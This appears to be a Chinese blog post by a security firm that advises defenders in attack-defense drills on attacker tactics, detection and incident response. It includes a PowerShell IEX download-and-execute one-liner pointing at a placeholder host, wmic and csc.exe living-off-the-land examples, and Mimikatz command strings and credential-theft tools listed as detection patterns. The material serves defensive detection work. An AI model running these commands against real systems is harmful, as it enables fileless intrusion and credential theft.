复检渗透测试网站安全攻守项目分析

最近我们Sinesafe参加的几家机构的渗透测试防守方防护方案评估复查,部分防守方缺乏对攻击者的正确认知,攻击者的手法已经比较高超了,不扫描,不落地,污染日志等都很普及了。同时也要正确认知对手:攻防演练中,攻击者并非无所不能,他们面临着和防御方一样的问题:时间紧,任务重。所以攻击者的攻击目标,攻击手法也是有迹可循的,知己知彼才能百战百胜。

渗透测试

一、知彼

攻击者也是讲成本的,因此防守方最好的策略是:做的比其他防守方好一点点即可。好一点的含义:不在低级问题上犯错(弱密码、互联网应用远程RCE、管理后台暴露、重要服务器未打补丁等)。对于“时间紧、任务重”的防守方来说,修建固若金汤的防线显然意味着大成本投入,以及最紧缺的时间,因此本文不会面面俱到,只选择性价比高值得快速投入的安全措施和大家分享。

攻击者一般:目标明确、步骤清晰、控制成本、反检测,反清理、三流分立。

目标明确:攻击者只攻击得分项,和必要路径(外网入口,内网立足点),对这些目标采取高等级手段,会隐蔽操作;对非必要路径顺路控制下来的服务器,并不怕被发现,用起来比较随意,甚至主动制造噪音,干扰防守方。

步骤清晰:信息收集-控制入口-横向移动-维持权限-攻击目标系统。每一步都是经典操作和教科书式手法。

控制成本:

优先攻击高权限账号,如管理员,目标系统负责人账号;

优先攻击运维/安全人员账号和终端,这些人往往有服务器root账号,安全设备管理员账号,可以进一步深入控制;

优先攻击集中管控设施,如域控,集中身份认证系统,终端管理系统,攻陷单系统即获得公司内大部分系统的权限;

优先攻击基础设施,如DNS,DHCP,邮件系统,知识分享平台,oa系统,工单系统;这些系统有内置高权限账号,或可以帮助攻击者隐蔽痕迹。或Git/SVN等开发源代码管理服务器,通过代码审计发现应用0day漏洞。

反检测,反清理:

样本隐蔽技术(白利用(带微软签名的程序执行未签名的黑dll),样本不落地执行(从网上加载样本,只运行在内存,不落盘不惊动杀软));

快速扩散(攻击者会将攻击包做成自动化工具,降低人力投入,快速控制一批有漏洞发服务器);

停止日志外发,日志清除(脚本优先停止常见日志外发工具;同时有开源自动化工具来劫持日志产生的进程,使得系统不产生日志;使用完后删除access.log等日志);

减少扫描,通过分析日志、分析配置文件、管理员来源IP等方式来获取内网的其他机器IP信息,而不是扫描。

点击添加图片描述(最多60个字)

复检渗透测试网站安全攻守项目分析

渗透测试检测阶段

原则:若域不安全,最佳修复方案是重装。

检测敏感共享目录访问:访问了AD服务器的非正常共享目录 (非SYSVOL文件夹)

检测mimikatz一系列攻击行为:

Mimikatz通过sysmon进程来进行检测,常见关键字有“gentilkiwi (Benjamin DELPY)”(公司名称)、

其他关键字:kerberos::golden sekurlsa::pth kerberos::ptt lsadump::dcshadow lsadump::dcsync sekurlsa::logonpasswords privilege::debug misc::skeleton

检测Kerberos弱加密方式:非AES加密方式的Kerberos票据加密请求相当可疑

检测异常注册表变更和dump:DSRMAdminLogonBehavior

变更AdminSDHolder

导出HKLM\SAM内容

导出HKLM\SYSTEM内容

导出HKLM\SECURITY内容

检测ntdsutil滥用:使用了ntdsutil的敏感参数activate instance ntds ;使用了ntdsutil的敏感参数set dsrm password

检测SID history变更:账号加入SID History成功、失败

检测lazagne密码提取工具:特征 lazagne

攻击者喜欢用的其他工具:

procdump、PsExec、cain、Mshta、cmstp、QuarkPwDump、getpass、gethash、ntdsdump、Get-PassHashes、Wce、psaattack。

3.3 主机防护(终端和服务器)对抗

攻击者在尝试控制终端和服务器时,为了绕过常规的杀毒软件,通常会使用一些免杀手段。而某些免杀手段(如白利用,样本不落地执行)由于非常稳定和高效,更是受到广大攻击者的青睐。

1.Powershell IEX组建下载执行.(文件在内存执行,不落硬盘)

利用代码示例:powershell.exe -nop -whidden -c IEX ((new-objectnet.webclient).downloadstring(‘http://x.x.x.x:81/aa’))”>

监测特征:”IEX” AND “(New-Object Net.WebClient).DownloadString“

2.Windows系统白文件利用(wmic.exe

利用代码示例:cmd/c wmic os get /format:”\\x.x.x.x\1.xsl”&start/wait notepad

监测特征:”wmic os get” AND “/format”3.Windows系统白文件利用(csc.exe)

利用代码示例:

“C:/Windows/Microsoft.NET/Framework64/v2.0.50727/csc.exe”/noconfig /fullpaths@”C:/Users/a/AppData/Local/Temp/l1xso2zu.cmdline”

监测特征:”csc.exe” AND (“/r:System.EnterpriseServices.dll”OR “/unsafe”)4.Windows系统白文件利用(msiexec.exe)

特征:被动执行后台执行的参数,有一定误报率。请自行研究,不再举例。

5.检测certutil白利用

特征:常见绕防火墙使用的参数。请自行研究,不再举例。

6.检测通过url.dll来进行不落地执行

请自行研究,不再举例。

3.4 账户和权限对抗

高权限一律清理,限制使用范围,每次使用后确认。

应用权限通过日志分析检测滥用。

关注备份账户、可修改权限账户的使用。

终端24小时重启一次。(对抗终端权限抓取类攻击)

3.5 瞬间死亡

瞬间死亡有两种方式:路径打穿、系统打穿。

3.5.1 路径打穿

直接从未想过(未设防)的路径攻击过来。邮件是控制终端第一选择入口,具体防护可参见《企业安全建设指南:金融行业安全架构与技术时间》第16章:邮件安全。

边缘网包括无线和自助终端,包括:打卡机、自动售卖机、会议室设备、ATM机、排队机等。限制无线和自助终端网络和内网访问。

限制分支机构、外联公司等网络和总部的网络访问。

不要相信理论上不能全通,但实际上存在全通内网的系统。(死于方便性)

3.5.2 系统打穿

系统打穿,都是血泪史。因为我们总是忘记了这些最大的风险源。优先攻击中心化的系统和跨两网的系统,包括终端安全管控控制台(控制台安全防护能力很弱)、运维管理系统/Zabbix/Nagios/堡垒机等、单点登录SSO系统、AD活动目录;

优先攻击基础设施:DNS、DHCP、邮件系统、研发服务器SVN/Git;

高价值终端:

网络管理员:终端内有网络拓扑和ACL控制策略,甚至可以修改访问控制;

安全管理员:有安全防护方案和检测系统、告警系统登录权限,很多安全系统做了登录来源限制,绕过手段之一就是控制安全管理员的终端,同时抓取安全管理员账户密码,攻击者一举两得;

研发个人终端/运维个人终端:高价值数据;

内网扫描器:网络权限较大,哪都能去。

代码服务器:代码数据价值比较高。私有协议开发的应用程序,源码要保护好,有经验攻击团队带代码审计技能成员,通过源码审计发现应用0day

3.6 容易出问题的点

互联网应用框架RCE

应用和中间件管理后台暴露

VPN:未启用双因素,或存在未启用双因素的部分用户

测试环境的测试系统未及时打补丁、弱密码

通过邮件入口控制办公终端

跨两网的设备

服务器密码同质问题

社工

四、事中和事后

前面分享了很多防护和检测的事项,但防守方到了这个阶段,更重要的是考虑一下事中的各种过载信息的研判和快速应急处置措施。

我们打内部攻防演习的时候,最大的困扰是决策和处置。

4.1 过载信息研判

有效高速的决策机制,什么权限范围内的由什么人决策,这是授权。

什么岗位(人)负责什么,这是职责划分。比如谁负责跟踪每条告警信息到Closed状态?谁负责断网?谁负责样本分析?谁负责失陷主机排查?谁负责溯源路径?谁负责记录?谁负责汇报?等等。

4.2 快速应急处置

4.2.1 硬件和后勤

大的作战室,容纳全部防守队伍;

好的白板(最好电子的),便于梳理攻击路径;

准备好零食和一日三餐、行军床。

4.2.2 重要信息同步

已经沦陷的IP清单(黑名单),同步给所有防守方;

是否C2域名快速判断,注意真假难辨的域名。

4.2.3 各类应急处置措施

断网:快速断网的操作规范和自动化工具

诱饵

临时添加ACL和FW规则

下线业务:和业务方建立畅通的沟通机制和快速的决策机制

如果失陷(疑似)主机,决策用于诱饵,务必确保诱饵的风险可控,万一持续利用诱饵在内网横向移动,再进行限制就困难了。

注意体力分配,高水平攻击者通常使用扫描行为等方式来分散防守方精力。

4.3 渗透测试复检

攻防实战演习后的总结改进提升,才是最终目的。

4.3.1 防护薄弱点和改进措施

安全团队

协作团队

厂商和第三方

安全团队不好推动的工作,不好讲的话,要不到的资源,都可以在这里提出来。

应急处置薄弱点和改进措施,落实到人、计划和资源中,才是务实的。

4.3.3 资源不足,要资源

安全运营是必由之路,参见 金融业企业安全建设之路

7*24小时的安全运营,既然攻击对手是7*24小时的,为什么安全运营不是呢?

4.3.4 必要的管理层汇报

五、注意事项

不要影响业务。攻防演习前的加固,需要妥善评估对业务可用性影响,攻防演习中的应急处置,需要妥善评估对业务可用性影响,毕竟,业务可用性才是老大,安全不是,摆正心态和位置,如果对渗透测试有想法的朋友可以找专业的网站安全公司来处理解决,国内推荐Sinesafe,绿盟,启明星辰,等等的网站安全公司。

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至253000106@qq.com举报,一经查实,本站将立刻删除。

发布者:SEO优化专员,转转请注明出处:https://www.chuangxiangniao.com/p/906059.html

(0)
上一篇 2025年1月4日 05:55:19
下一篇 2025年1月4日 05:55:47

AD推荐 黄金广告位招租... 更多推荐

相关推荐

  • 第三方检测SW-LIMS微服务架构部署

    随着人们的消费意识和权利意识逐渐增强,第三方检测行业得以迅速发展,其市场竞争也越发激烈。第三方检测机构实验室检测系统化、标准化、精细化、专业化已成为在行业内立足与发展的有效竞争力。而科学充分运用实验室信息管理系统(LIMS)提升内部工作效率…

    2025年1月4日
    100
  • 网站安全防护渗透测试常见的攻击方法

    国内对渗透测试以及安全评估的研究起步较晚,并且大多集中在在渗透测试技术上的研究,安全评估方面也有部分企业和研宄团体具有系统的评估方式。然而国内对基于渗透测试的自动化集成系统研宄还非常少,从目前的网络安全态势来看,传统的渗透测试方式己经无法满…

    安全 2025年1月4日
    100
  • 渗透测试 域名状态码协议讲解

    网站上线前需要对网站进行渗透测试,上一节我们Sine安全讲师讲了web的基础知识了解,明白了具体web运行的基础和环境和协议,这一节我们来讨论下域名和DNS工作原理以及http状态码和请求的协议来分析检测中的重点域名收集。 1.3. 域名系…

    2025年1月4日
    200
  • 渗透测试 网站代码审计等基础方法篇

    这几天整理了下网站渗透测试中基础部分的第三节,我们SINE安全渗透工程师对代码安全审计,手工渗透测试检查代码的危险漏洞方法,找出安全问题重点,配合工具扫描来达到测试漏洞的目的,本测试重点仅限于客户授权才能操作,切记忽非法尝试入侵!以下方法只…

    建站经验 2025年1月4日
    100
  • 网站渗透测试详细检测方法

    越来越多的网站以及app手机端客户注重安全渗透测试服务,上线前必须要对平台进行全面的预渗透测试找出安全漏洞以及BUG,很多客户找我们SINE安全,做渗透测试服务的时候对具体的流程可能不太了解,下面我们把具体的渗透测试方法流程大体写的全面一点…

    建站经验 2025年1月4日
    100
  • 实战渗透测试判断网站信息内容讲解

    上一节讲到渗透测试中的代码审计讲解,对整个代码的函数分析以及危险语句的避让操作,近期很多客户找我们Sine安全想要了解如何获取到网站的具体信息,以及我们整个渗透工作的流程,因为这些操作都是通过实战累计下来的竟然,渗透测试是对网站检查安全性以…

    建站经验 2025年1月4日
    200
  • 渗透测试对网站注入攻击方法剖析

    国庆即将到来,前一期讲到获取网站信息判断所属环境以及各个端口的用处和弱口令密码利用方法,这期仍有很多客户找到我们Sine安全想要了解针对于SQL注入攻击的测试方法,这一期我们来讲解下注入的攻击分类和使用手法,让客户明白漏洞是如何产生的,会给…

    建站经验 2025年1月4日
    200
  • 渗透测试XSS跨站攻击检测手法

    国庆假期结束,这一节准备XSS跨站攻击渗透测试中的利用点,上一节讲了SQL注入攻击的详细流程,很多朋友想要咨询具体在跨站攻击上是如何实现和利用的,那么我们Sinesafe渗透测试工程师为大家详细的讲讲这个XSS是如何实现以及原理。 XSS全…

    2025年1月4日
    200
  • 渗透测试中遇到的越权漏洞该如何解决

    渗透测试在网站,APP刚上线之前是一定要做的一项安全服务,提前检测网站,APP存在的漏洞以及安全隐患,避免在后期出现漏洞,给网站APP运营者带来重大经济损失,很多客户找到我们SINE安全公司做渗透测试服务的同时,我们积累了十多年的漏洞检测经…

    建站经验 2025年1月4日
    200
  • 网站命令执行渗透测试步骤详情

    哈喽大家好,近期我们Sine安全对客户平台进行渗透测试的时候,发现有一些命令执行的漏洞测试语句和函数,导致服务器被提权被入侵,上一节提到XSS跨站脚本攻击检测方法,本章来总和一下脚本执行命令的详细检测手段,以及绕过waf的办法,只有这样详细…

    建站经验 2025年1月4日
    200

发表回复

登录后才能评论

联系我们

156-6553-5169

在线咨询: QQ交谈

邮件:253000106@qq.com

工作时间:周一至周五,9:30-18:30,节假日休息

联系微信